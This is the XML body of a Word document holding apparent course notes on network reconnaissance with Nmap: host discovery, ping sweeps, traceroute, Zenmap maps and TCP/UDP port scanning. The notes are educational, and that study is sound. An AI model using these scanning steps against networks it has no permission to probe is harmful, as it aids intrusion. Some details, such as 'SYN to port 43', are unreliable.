                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Written by Fyodor and the Nmap development team</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="459F79CA" w14:textId="0B141C93" w:rsidR="00E96F97" w:rsidRPr="006F5A04" w:rsidRDefault="00E96F97" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Available for Linux and Windows, Zenmap GUI for virtualization.</w:t>
            </w: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0FD942AC" w14:textId="5554D807" w:rsidR="008B45D1" w:rsidRDefault="008B45D1" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nmap sends 4 packets to identify UP hosts when run as a privileged user:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="504167AF" w14:textId="279164E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0EA46E7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SYN to port 43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A601BDC" w14:textId="552F7AF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ACK to port 80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B10FF6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ICMP Timestamp Request</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C22AB56"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Sweeping through address space to identify active hosts on the network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F74E6A4"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Attacker sends an ICMP echo request to a range of IP addresses.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA7DCDF"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something replies, that address is in use by some target system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06DD656C"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nothing replies, that address is not in use, or there is network filtering.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00237F80"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By default, Nmap sweeps each target address before port scanning it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EFE37D0" w14:textId="79629042" w:rsidR="008B45D1" w:rsidRDefault="008B45D1" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>This can be ignored altogether (the -Pn flag in Nmap)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70ACB880" w14:textId="69A0A3FC" w:rsidR="008B45D1" w:rsidRPr="006F5A04" w:rsidRDefault="008B45D1" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Run the Nmap sweep as root for the best results.</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40397F99" w14:textId="67B7E291" w:rsidR="00303D06" w:rsidRDefault="00303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="63"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA485B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo nmap -sn </w:t>
            </w:r>
            <w:r w:rsidR="00FA485B" w:rsidRPr="00FA485B">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: checks if the host is up</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F36C877" w14:textId="35A27EC8" w:rsidR="00FA485B" w:rsidRPr="008C18CF" w:rsidRDefault="008C18CF" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nmap’s -sn option disables port scanning and focused solely on host discovery. Best run with root privileges.</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CCAFDDF" w14:textId="6A1322B9"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 xml:space="preserve">sudo nmap -sn </w:t>
            </w:r>
            <w:r w:rsidR="001E019A">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">-- </w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>traceroute</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD38C39"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Traceroute sends packets with small time to live (TTL) values.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D4D34A1"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IPv4 TTL and IPv6 hop limit is the</w:t>
            </w:r>
            <w:r w:rsidR="00AF222E">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> number of hops the packet should go before being discarded.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04EEF840" w14:textId="77777777" w:rsidR="00AF222E" w:rsidRDefault="00AF222E" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>If exceeded, the router returns an ICMP TTL-Exceeding message.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3865F402" w14:textId="2E1A2A7B" w:rsidR="00AF222E" w:rsidRPr="006F5A04" w:rsidRDefault="00AF222E" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Based on the source address of the TTL-exceeded message, you can determine the router for a given hop.</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AF222E" w:rsidRPr="006F5A04" w14:paraId="020E1E57" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="798712CF" w14:textId="3DAFF4E7" w:rsidR="00AF222E" w:rsidRPr="006F5A04" w:rsidRDefault="00763158" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Trace</w:t>
            </w:r>
            <w:r w:rsidR="00A1749D">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DE98AE8" w14:textId="0AA9B3B2" w:rsidR="00AF222E" w:rsidRPr="006F5A04" w:rsidRDefault="00A1749D" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>By adding – traceroute we get network hop requests: adding -oA logs all results to the file prefix insecure-net.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1382BBED" w14:textId="2B5F662B" w:rsidR="00AF222E" w:rsidRPr="006F5A04" w:rsidRDefault="00A1749D" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19703E2E" w14:textId="612ABB8F" w:rsidR="00AF222E" w:rsidRPr="006F5A04" w:rsidRDefault="00A1749D" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A1749D" w:rsidRPr="006F5A04" w14:paraId="02A8096A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCED73A" w14:textId="6FBC98C1" w:rsidR="00A1749D" w:rsidRDefault="00A1749D" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Zenmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D23C096" w14:textId="0DF0AA90" w:rsidR="00A1749D" w:rsidRDefault="00756159" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Once Nmap finishes conducting a network sweep and its tracerouting activities, the Zenmap GUI can provide an interactive graphical portrayal of the network. This output is a cumulative view of recent scans conducted by Nmap, showing each system identified during ping sweeping, along with the series of connections between the systems. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F9FFF46" w14:textId="65939177" w:rsidR="00A1749D" w:rsidRDefault="00756159" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="381116E4" w14:textId="676355D4" w:rsidR="00A1749D" w:rsidRDefault="00756159" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="34E82A51" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7526FBB6" w14:textId="090D87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r w:rsidR="00756159">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Zenmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="638A4082" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00756159" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Port scanners are a must for any attacker’s toolbox.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3676F8FF" w14:textId="77777777" w:rsidR="00756159" w:rsidRDefault="00756159" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>They help identify openings on a system and the type of system allowing the attacker to focus an attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131B3016" w14:textId="77777777" w:rsidR="00756159" w:rsidRDefault="00756159" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Most internet applications use TCP or UDP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="686DDB24" w14:textId="77777777" w:rsidR="00756159" w:rsidRDefault="00756159" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TCP: connection oriented (sequence preserved and retransmitted if needed)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73936F8C" w14:textId="45710DE2" w:rsidR="00756159" w:rsidRPr="006F5A04" w:rsidRDefault="00756159" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UDP: Connection-less (get it there if you can)</w:t>
            </w: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577AE258" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="0099543F" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TCP and UDP have ports: A field in the TCP and UDP headers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139ADB46" w14:textId="77777777" w:rsidR="0099543F" w:rsidRDefault="0099543F" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Total of 65,536 (times 2) ports.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07CE66A7" w14:textId="77777777" w:rsidR="0099543F" w:rsidRDefault="0099543F" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Port 0 is invalid; any packets to port 0 should be dropped.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8312AF" w14:textId="77777777" w:rsidR="0099543F" w:rsidRDefault="0099543F" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Port scanners send packets to various ports to determine what is listening.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59234714" w14:textId="77777777" w:rsidR="0099543F" w:rsidRDefault="0099543F" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Find TCP 80, web server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB8CF4E" w14:textId="77777777" w:rsidR="0099543F" w:rsidRDefault="0099543F" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Find TCP 445, windows server message block</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED612F4" w14:textId="0D480C2B" w:rsidR="0099543F" w:rsidRPr="006F5A04" w:rsidRDefault="0099543F" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Find UDP 53, DNS server</w:t>
            </w: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5A180773" w:rsidR="00185DD3" w:rsidRPr="00185DD3"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TCP Three-Way Handshake</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E866137" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00185DD3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Initial SYN establishes sequence number for A to B, usually, B must remember this allocating state in its connection queue.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63DDA5AB" w14:textId="3303269B" w:rsidR="00185DD3" w:rsidRPr="006F5A04" w:rsidRDefault="00185DD3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Response SYN-ACK establishes sequence number for B to A.</w:t>
            </w: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185DD3" w:rsidRPr="006F5A04" w14:paraId="5EA1D152" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D3ED7F" w14:textId="3B95DFD5" w:rsidR="00185DD3" w:rsidRPr="006F5A04" w:rsidRDefault="00185DD3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UDP Three-Way Handshake</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F96324E" w14:textId="77777777"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Does not use three-way handshake unless it is an application-level functionality.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4351E364" w14:textId="77777777"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Does not require connection establishment mechanism.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614B0C48" w14:textId="6273F0DC"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Up to the protocol using UDP on how to implement synchronizing/acknowledgment functionality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17231C9F" w14:textId="14EC0F1A" w:rsidR="00185DD3" w:rsidRPr="006F5A04" w:rsidRDefault="00185DD3" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="390DB9E8" w14:textId="4CE18684" w:rsidR="00185DD3" w:rsidRPr="006F5A04" w:rsidRDefault="00185DD3" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>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45543E6E" w14:textId="77777777" w:rsidR="00303D06"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Ping sweeps and ARP scans.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A73F5CB"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TCP connect scans (three-way handshake)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C70B470"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TCP SYN scans (half-open scans)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34AB561B"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UDP scanning</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="288529DE" w14:textId="36CFB124"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Version Scanning</w:t>
            </w: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8540B1" w:rsidRPr="006F5A04" w14:paraId="1F29AF93" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34F8CC85" w14:textId="1464CC3C" w:rsidR="008540B1" w:rsidRPr="006F5A04" w:rsidRDefault="008540B1" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
